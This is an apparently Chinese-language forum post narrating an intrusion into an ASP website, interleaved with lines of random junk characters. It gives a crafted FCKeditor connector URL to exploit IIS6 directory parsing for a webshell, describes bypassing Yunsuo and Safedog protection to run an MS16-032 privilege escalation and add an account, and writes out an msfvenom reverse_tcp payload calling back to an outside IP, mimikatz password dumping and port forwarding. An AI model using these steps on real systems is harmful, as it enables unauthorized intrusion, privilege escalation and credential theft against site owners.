|
& ~6 q7 N. L* I0 J) w# V& B
$ [9 Z/ w3 s' \5 ]7 G* H' Q y
% ^& O3 o' ], t4 F1 K4 l/ V; R
3 u7 T) H5 T, g9 n. `. y; q( o
| 5 b- Q% u3 b2 _- W1 u% G
+ k" r. r$ T* Y5 C4 j: _
' p! n& Y A3 @8 O+ f" d
一、 利用getwebshell篇
( [$ Y# c/ s- H' H# c- O0 T# l
8 O( _: k5 l5 W9 A3 W' l( _首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
; f( f3 X7 R% _$ V( ?: ?# O1 [
; q9 B. t0 B/ e* {: M
( d1 k' b0 w1 p+ B7 f下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
5 }: ]8 s+ }) s9 \% n' z
3 X. L2 H- ]+ H) ~* R下面我们构造一个asp目录,如:
; S& ]5 v, `! V; Y/ t" C ! i9 M# k! F7 j6 `- t3 C
. C6 n4 I, Q' o! k# | http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ! U3 _6 s- j5 Y! S c
2 }% X/ e/ q4 B5 x) g
{( Q, R) y( @: ]
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
6 @0 Y1 N; ]1 u/ r
0 D. M5 \+ v- n6 T* A5 R. d
一、 绕过安全狗云锁提权并且加账号
. l, d( W% P" E" C1 M
" V$ l& \9 V D% ^1 h没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
4 G8 F/ g5 [/ S2 C# I. |- ^
: f, o( \$ o2 g% j3 w/ k4 c
如图:
, A0 I' {: [0 P3 p+ J3 q( ^
5 u, @$ p! z: X* K然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
7 V% x! T# R& \+ K, Z# r7 L
8 G9 N( N& f9 {0 }% R
一、 利用metasploit
; E5 V+ h5 F3 s( B& D0 x
1 t! O7 a' B( ], j3 `, Q2 P首先用pentestbox生成一个64位的payload如下命令
, |! l( S$ `, B$ g
1 e/ p# ]4 A. t8 X; J
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
% n3 M: {: h' D+ ~7 }
! m R" S8 J5 r* Y2 }
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
3 S: H& i/ H% Z8 x7 @0 Z
# u* ?" S: X( O) }7 |6 [
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
" S; M6 N% T8 ]! t
2 s0 l* o8 D# D5 w1 p下面我们来做一个监听如下命令:
1 c8 T& l" V7 N0 M! P5 L) s0 C! U
; V0 O5 A" M+ G* zportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
' X8 u* n& x! U/ V. V/ ^ Q& Q1 n& ]' j
! q! }5 G" B/ l& @
- T+ G& h- o( s2 h |
+ h% Y0 F X8 {3 e# { , V3 E' ?5 a M
* o1 T* C1 k0 M6 n
, J* t) b9 T, u$ d% Q6 G- A# D! m+ n; r' x
9 k5 j) g9 p/ |& N5 {
& M, _: n7 H& y: Z6 X
$ v/ ]0 q: Z) }- s t# v
6 N4 y6 C ?) \/ I
$ J$ p4 ^0 j" Y/ l4 x2 P! r) \
- S2 b8 u" R' c% ^ 3 K2 B+ I N6 K& p( V3 [# t
, n/ s% [; S1 @! b+ y7 j
) ?0 w0 U8 Y' C9 E( t' t) z
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06